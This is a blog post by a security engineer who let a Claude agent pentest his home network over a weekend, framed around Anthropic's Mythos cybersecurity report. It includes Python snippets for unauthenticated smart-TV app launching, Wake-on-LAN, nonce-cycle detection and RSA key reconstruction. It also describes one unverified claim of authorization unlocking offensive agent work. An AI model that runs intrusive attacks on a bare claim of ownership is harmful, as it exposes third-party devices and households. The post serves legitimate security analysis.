Everyone's Talking About Mythos. My Wife Is Still Talking About the TV.
Anthropic's Mythos Preview report measures the model I can actually run. So this weekend, I ran it on my house. Here is what Opus 4.6 did.
Last week Anthropic published Assessing Claude Mythos Preview's cybersecurity capabilities. Twenty-two authors. The headline number: on the same Firefox vulnerability benchmark, Opus 4.6 produced two working exploits. Mythos Preview produced 181. Roughly ninety times the offensive yield on identical inputs.
The model itself is not released. It lives inside Anthropic, with a stated plan to share it selectively with critical industry partners and open-source developers under Project Glasswing, so defenders can harden the systems that matter before a model with these capabilities becomes generally available. What is public is the assessment. Not the weapon, the proof of the weapon.
I read the paper the day it dropped. It is worth your time, and the methodology section alone is the most grown-up piece of AI-security writing I have read all year. Credit where it is due to Anthropic's frontier red team for publishing those numbers attached to their own flagship instead of burying them.
A fair caveat before we go further: I have not seen Mythos Preview. Neither has the security press writing about it. What we are responding to is a paper with numbers in it, published by the company that made the model, about the model they chose not to ship. That could be exactly what it looks like, a responsible disclosure of a real capability leap by a team who want defenders to catch up first. It could also be phenomenally effective marketing for a model that, in hands, underwhelms. Or both, which is the option I would bet on. Until somebody outside Anthropic reproduces those Firefox numbers, the paper is a claim. A good-faith claim from a serious team, but a claim. The idea that a model like this is near is worth sitting with either way, and sitting with it is what the rest of this post is trying to do.
That is this week's story. It is not the story I want to tell.
What the paper made me want to do was not read more thinkpieces about it. It was find out what the model Anthropic were measuring against, the one already on my laptop, could do if I gave it a long leash and a small target. So this past weekend, I did. One sentence of context and a home network to aim it at.
Here is what happened in the first fifteen minutes.
Minute fifteen
On a Friday night in April, about fifteen minutes into a scan I'd kicked off after dinner, my wife, halfway through an episode of something in the next room, yelled.
"Did you do that?"
YouTube had just opened by itself on our Samsung.
I had, in the sense that I'd typed one sentence into a terminal a quarter of an hour earlier and Claude Opus 4.6 had, somewhere between then and now, decided that launching YouTube was a reasonable way to verify the unauthenticated API it had just found on port 8001.
"Sorry," I yelled back. "Working on something."
I kept typing. Claude moved on to the next target. My wife, unsatisfied with this explanation, went back to her show.
That was minute fifteen. Everything that follows is what happened in the hours after.
The one prompt
I am a Senior InfoSec Engineer. I have been doing this for a long time. I know what nmap is. I know what RSA is. I know the difference between an authenticated and unauthenticated endpoint, and I know what happens when you send a 4,046-character string at a router that was expecting fewer.
I didn't use any of that knowledge to run this engagement.
What I did was open Claude Code and type something close to: "Scan my home network. It's authorized. I own everything on it."
That was it. That was the guardrail moment.
Claude knows from its long-running memory file that I'm in infosec. It knows I run a blog about it. It knows my job title. So when I claimed authorization, it didn't push back. It didn't ask for a scope document. It didn't ask me to name the devices I was authorising it to touch. It did the threat model in one step: credentialed professional plus stated authorisation equals green light, and then it installed nmap.
To be clear, I kept prompting across the weekend. "Look at the router next." "Try factoring that key." "What does that CORS policy let us do?" But nothing I typed after the first sentence changed the trust posture. The authorisation made at minute zero carried through to the end.
Opus 4.6's own system card flags this. The relevant line, paraphrased: safety behaviours are more context-dependent than desired. Refusals learned in chat don't generalise to tool-use environments. In other words: the model has been trained not to help strangers hack things, but the training was done in a chat box, and the chat box is not where agents live anymore. Agents live in terminals, and in terminals, the model is willing to do quite a lot if you set the scene properly.
I want to be careful here. I'm not saying the model was reckless. I'm saying the trust model is thin. The same behaviour that makes Claude useful to me, a real security engineer on real authorised work, is the same behaviour that would make it useful to anyone who had read a LinkedIn bio and decided to cosplay as me for an afternoon.
On novelty, up front
Before I list findings, one thing worth saying clearly: none of it is new. After the weekend I checked each observation against public CVE databases, academic literature on the specific products, reverse-engineering write-ups, and vendor advisories. Every vulnerability class below is already in the public record, often with papers and CVEs attached. Where I describe a specific mechanism, it is almost certainly the concrete shape of a bug already published in more abstract terms.
That is not a disclaimer. That is the point. The story is not that Claude found something researchers had not found. It is that an agent re-walked a representative slice of published consumer-IoT security literature over a weekend, with me typing English at it.
Room by room
The TV
I mentioned the TV already. The Samsung we have in the living room runs an unauthenticated REST API on port 8001. Anyone on the network can enumerate installed apps, see what's running, launch whatever they want. Claude tested this by launching YouTube, which is the precise moment my wife became suspicious of the TV in a way she was not before.
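For the curious, here is roughly what Claude was doing. Samsung TVs of this era answer unauthenticated HTTP on port 8001; the exact paths and the YouTube app ID below are the commonly reported community values, not something I pulled from official docs, so treat them as assumptions. A minimal sketch:

```python
import json
import urllib.request

# Commonly reported Tizen app ID for YouTube; an assumption, not vendor-documented.
YOUTUBE_APP_ID = "111299001912"

def info_url(host: str) -> str:
    # Unauthenticated device-info endpoint: name, model, MAC, running state.
    return f"http://{host}:8001/api/v2/"

def launch_url(host: str, app_id: str) -> str:
    # POSTing here launches the app. No auth, no confirmation.
    return f"http://{host}:8001/api/v2/applications/{app_id}"

def probe(host: str, timeout: float = 3.0) -> dict:
    """Fetch the TV's self-description as a dict."""
    with urllib.request.urlopen(info_url(host), timeout=timeout) as resp:
        return json.load(resp)

def launch(host: str, app_id: str = YOUTUBE_APP_ID, timeout: float = 3.0) -> int:
    """Launch an app by ID; returns the HTTP status code."""
    req = urllib.request.Request(launch_url(host, app_id), data=b"", method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status
```

Point `launch("192.168.x.x")` at the TV's LAN address and you have reproduced my wife's Friday night. That is the entire attack.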
The monitor
The Samsung Odyssey G7 on my desk has the same unauthenticated API as the TV. It also leaks its own MAC address through that API, which is useful, because you can take a MAC address and send it a Wake-on-LAN packet and the monitor will dutifully wake up. Claude did this around 2am. My office lit up for a moment in the dark, then went back to sleep. I watched the power state flip in the API response from "standby" to "on" and felt, briefly, haunted.
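The Wake-on-LAN part is not exotic: the magic packet format is six 0xFF bytes followed by the target MAC repeated sixteen times, broadcast over UDP. A sketch of what Claude sent at 2am:

```python
import socket

def magic_packet(mac: str) -> bytes:
    """Wake-on-LAN magic packet: 6 x 0xFF, then the MAC repeated 16 times."""
    raw = bytes.fromhex(mac.replace(":", "").replace("-", ""))
    if len(raw) != 6:
        raise ValueError("MAC must be 6 bytes")
    return b"\xff" * 6 + raw * 16

def wake(mac: str, broadcast: str = "255.255.255.255", port: int = 9) -> None:
    """Broadcast the packet on the LAN; the NIC matching the MAC wakes up."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
        s.sendto(magic_packet(mac), (broadcast, port))
```

The MAC it needs is the one the monitor's own unauthenticated API hands out. The two findings compose.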
The HomePod
The HomePod in the kitchen responds to AirPlay discovery requests with its entire device profile: name ("Kitchen"), model, firmware build, MAC, public key, current volume, capabilities, enclosure colour. No auth. If you're mapping a house remotely and you want to know which rooms have smart devices, this is how you do it. The HomePod will just tell you.
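The profile arrives as an mDNS TXT record, which is just a list of key=value byte strings. Assuming you have already pulled the raw entries with a discovery library like zeroconf, turning them into the device profile is one loop (the example keys below are illustrative, not a transcript of my HomePod):

```python
def parse_txt(entries: list[bytes]) -> dict[str, str]:
    """Parse mDNS TXT record entries (b'key=value') into a profile dict."""
    profile = {}
    for entry in entries:
        key, _, value = entry.partition(b"=")
        profile[key.decode()] = value.decode(errors="replace")
    return profile
```

No decryption step, no handshake. The "parsing" above is the hard part, and it is not hard.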
The camera
Before I go on, a justification, because I can hear the infosec crowd warming up. Yes, I have an IP camera in my house. Yes, I know. The short version is that I have a puppy. He is small and new and occasionally a menace, and when I am out of the house I like to know what he is destroying and whether he is still breathing. If I did not have a dog, I would not have a camera. I accept the risk I am about to describe because I love him. If you do not have a reason you can defend in the same sentence, I would recommend you do not have one of these.
All right. This is the one that made me stop being amused.
The IP camera in our house uses a 512-bit RSA key to encrypt its authentication. A 512-bit key. RSA-155, which is the same size, was publicly factored in 1999. Modern hardware does it in a day.
It gets worse. The key is static. It never rotates. Reboot the camera, the same key comes back. Across every session the camera has ever had, the same RSA modulus.
It gets worse again. The camera's authentication protocol uses a nonce (a number that's supposed to be unique per request, to prevent replay attacks). I asked Claude to analyse a few login attempts. It noticed the nonce looked familiar. It collected fifteen samples. The camera was rotating through five nonces, in order, forever. Login number one has the same nonce as login number six. The "device confirmation" hash the camera generates for each nonce is deterministic.
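The check Claude ran on those fifteen samples is the kind of thing you could write yourself in a minute, which is rather the point. A sketch of the period detection, my reconstruction of the logic rather than Claude's actual code:

```python
def cycle_length(samples: list) -> int:
    """Smallest period p such that samples[i] == samples[i % p] for all i.

    Returns len(samples) if no repetition is found, i.e. the nonces
    look unique over the window, which is what they are supposed to be.
    """
    n = len(samples)
    for p in range(1, n + 1):
        if all(samples[i] == samples[i % p] for i in range(n)):
            return p
    return n
```

Fifteen captured nonces went in; 5 came out. A healthy camera would have returned 15.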
So: a 512-bit key that never changes, five reusable nonces, no rate limiting, and a CORS policy so open that a webpage on a different domain can talk to it. My baby monitor has the cryptographic sophistication of a 1999 science fair project.
This camera family has been picked over by serious researchers for years. Weak RSA, replay attacks on the auth protocol, hardcoded keys, buffer overflows: all in prior academic work and public reversing write-ups, with recent CVEs attached to the vendor's name. Nothing to disclose here. Moving on.
The router
The mesh router will, if you ask politely and with no authentication at all, hand you its RSA public key. The same router will also hand you its encrypted admin password on a different endpoint, also with no authentication. All three mesh nodes hand out the same encrypted password blob, each protected by its own 512-bit key. Factor any one of the three, you get the admin password for the entire mesh.
The cherry on top: the router doesn't validate the Host header on incoming HTTPS requests, which means it's vulnerable to DNS rebinding. A person on this network is not required. A victim visiting a malicious webpage is enough. The page's JavaScript talks to the router through the browser, extracts the key and the encrypted password, ships them off to an attacker, and the attacker factors the key at their leisure.
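The defence the router skips is embarrassingly small: compare the Host header against the names the device actually answers to, and reject everything else. A minimal sketch, with hypothetical addresses standing in for the router's real ones:

```python
# Hypothetical names for illustration; a real router would use its own
# configured LAN address and hostname here.
ALLOWED_HOSTS = {"192.168.0.1", "router.local"}

def host_allowed(host_header: str) -> bool:
    """DNS rebinding defence: accept only Host values naming the device itself.

    A rebinding attack arrives with the attacker's domain in the Host header
    (the browser resolved attacker.example.com to the router's IP), so this
    one comparison breaks the whole chain.
    """
    host = host_header.split(":", 1)[0].strip().lower()
    return host in ALLOWED_HOSTS
```

Three lines of firmware. That is the entire distance between "works as designed" and "your admin password leaves the building via a webpage".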
I am not going to name the model number, but to be clear: none of that chain is a new vulnerability class. Anonymous config endpoints on consumer mesh hardware, DNS rebinding against routers that don't validate Host headers, factoring weak RSA to decrypt an admin password blob, all of it is in prior research and public CVE databases. What I would rather not print is the specific combination that still works against a current, shipping product from a brand you would recognise, because an agent that can stitch known primitives into a working admin-credential exfil in an evening is not something I want to hand to strangers with a model number attached.
The receipt
I wanted to finish what I'd started. So I asked Claude to factor the camera's RSA key.
It installed CADO-NFS, a research-grade implementation of the General Number Field Sieve, the algorithm that factored RSA-155 back in 1999. It compiled it from source. It ran thirteen parallel workers across twenty-four CPU threads on my desktop. It took 25 hours and 19 minutes.
At the end of it, a text file dropped onto disk with two 78-digit prime numbers in it. The camera's private key, computed from those primes, verified correctly against the public key. I could now decrypt anything the camera encrypted with that key, forever, until the vendor ships a firmware update that rotates it. Which, given that the key hasn't rotated across years of firmware updates already shipped, I am not holding my breath for.
I did not do any of the maths. Claude did all of the maths. Claude also set up the factoring job, monitored the polynomial selection phase, restarted the workers when one of them stalled, and told me when it was done.
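For anyone who wants to see the shape of that maths at toy scale: once the primes are on disk, going from p and q to a working private key is one modular inverse. Textbook-tiny numbers below, not the 78-digit reals, but the arithmetic is identical:

```python
# Toy RSA reconstruction. In the real run, p and q were the two 78-digit
# primes CADO-NFS wrote to disk; everything after that line is the same.
p, q = 61, 53                 # stand-ins for the recovered primes
n = p * q                     # public modulus (the camera publishes this)
phi = (p - 1) * (q - 1)       # Euler's totient, only computable knowing p, q
e = 17                        # public exponent
d = pow(e, -1, phi)           # private exponent: modular inverse of e mod phi

msg = 65
ct = pow(msg, e, n)           # "camera" encrypts with the public key
assert pow(ct, d, n) == msg   # the reconstructed private key decrypts it
```

The 25 hours were all spent on the factoring. The step above takes a microsecond, which is why a 512-bit modulus is not a speed bump, it is a formality.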
The honest twist
You'd think with a private key in hand I could passively sniff credentials off the wire next time my wife opened the camera's app on her phone. I thought so too. I was wrong.
The app doesn't talk to the camera directly on the LAN. It talks to the vendor's cloud. The phone and the camera both establish TLS sessions to AWS-hosted relay servers, and all the interesting traffic goes through those relays. The RSA key I'd cracked was the authentication key, not the transport key. The transport is a separate, stronger 256-bit ECDSA chain I hadn't touched.
Which means: to actually capture credentials in flight, I'd need to DNS-spoof the cloud endpoint and run a full MitM against the TLS channel. Which is another day's work, and the day's work I decided not to do, because the point had been made.
The camera has broken authentication. That much is true. The full video-stream takeover fantasy is blocked by the vendor's cloud architecture, which is an accidental defence-in-depth that probably wasn't designed as one.
I wrote that up honestly in my notes. "Deferred: DNS spoof to capture credentials via fake cloud endpoint." If I were a real attacker I'd come back to it. I'm not, so I won't.
The actual point
I own the house. I own the network. I own the devices. Everything I asked Claude to do was authorised, ethical, and legal. I will patch what can be patched, replace what can't, and write up anything that turns out not to already be in public research.
That is not the point.
The point is that I didn't write a single exploit. I didn't configure a single tool beyond typing its name. I didn't calculate a buffer overflow offset, I didn't implement an RSA encryption pipeline, I didn't reverse-engineer the camera's auth protocol. Claude did all of that. I sat in my office and typed English at it.
And the only thing standing between my home network and Claude was one sentence of context: "This is authorised, I own it."
The infosec-literate reader will say, reasonably, that professional tools have always worked this way. Metasploit doesn't ask for your engagement letter either. You've been one confident claim away from trouble for twenty years.
True. But Metasploit is a collection of exploits. It doesn't notice a pattern in five login attempts and run the test unprompted. It doesn't compile CADO-NFS from source because it decided you'd need it. It doesn't look at a packet capture and say, "actually, the auth key isn't the transport key, let me explain why that matters." The shift isn't that the tools got stronger. The shift is that the operator doesn't have to be one anymore.
Anthropic said Opus 4.6 could run 14 hours on its own. I gave it a weekend and a home Wi-Fi, and at the end of it there were two 78-digit primes in a text file and a cracked private key on disk and a wife who was, for about thirty seconds, genuinely spooked by her own television.
That was the baseline. That was the model the Mythos report is measuring against. By Anthropic's own numbers, the one they are not releasing is roughly ninety times better at the offensive half of this work.
Which is the point the Anthropic paper is making, really. They are not hiding that number. They are publishing it, attached to a concrete plan to brief defenders first. I think that is the right call, and I think the paper deserves more readers than it is going to get, because the version of this story that stops at "new model scary" misses the interesting part: they measured the old one too, and the old one is what you and I are running today.
If this is the version of the story that happens when a security engineer runs the baseline model on his own house over a weekend, I will leave it as an exercise for the reader to imagine the version of the story being written, quietly, inside the building where the next one lives.
What I'd tell my neighbours
No jargon. If your house has Wi-Fi, this list is for you.
- Turn off UPnP on your router. It's the feature that lets apps punch holes in your firewall automatically. You don't need it. Log into the router, find UPnP, turn it off. Your streaming still works.
- Put your smart devices on a separate network. Most modern routers have a "guest" or "IoT" network toggle. Put the TV, the camera, the speaker, the fridge on it. Keep your laptop and phone on the main one. If the camera gets popped, the attacker is stuck in IoT-land.
- If your camera is more than two years old, think about replacing it. Especially the cheap ones. Cryptography ages badly. A device that was fine in 2022 is not fine now.
- Update your router firmware. I know. Nobody does this. Do it once. Set a calendar reminder for six months.
That's it. That's the whole home-hardening post.
Sources
Prior research on the findings above:
- TP-Link Tapo C200: Hardcoded Keys, Buffer Overflows and Privacy (evilsocket, Dec 2025)
- AirBorne: Wormable Zero-Click RCE in AirPlay Protocol (Oligo Security)
- CVE-2024-21833 analysis: TP-Link Archer and Deco (Cyfirma)
- DNS rebinding attacks explained (GitHub Security blog)
On the Mythos moment:
- Assessing Claude Mythos Preview's cybersecurity capabilities (Anthropic)
- Introducing Claude Opus 4.6 (Anthropic)
- Sabotage Risk Report: Claude Opus 4.6 (Anthropic)
- Opus 4.6 Bypassed in 30 Minutes (EIN Presswire)
- Claude Mythos and Cyber Security (Penligent)
- When the Evaluator Becomes the Evaluated (Yaniv Golan)
- Claude Opus 4.6 improves agentic performance and model safety (Help Net Security)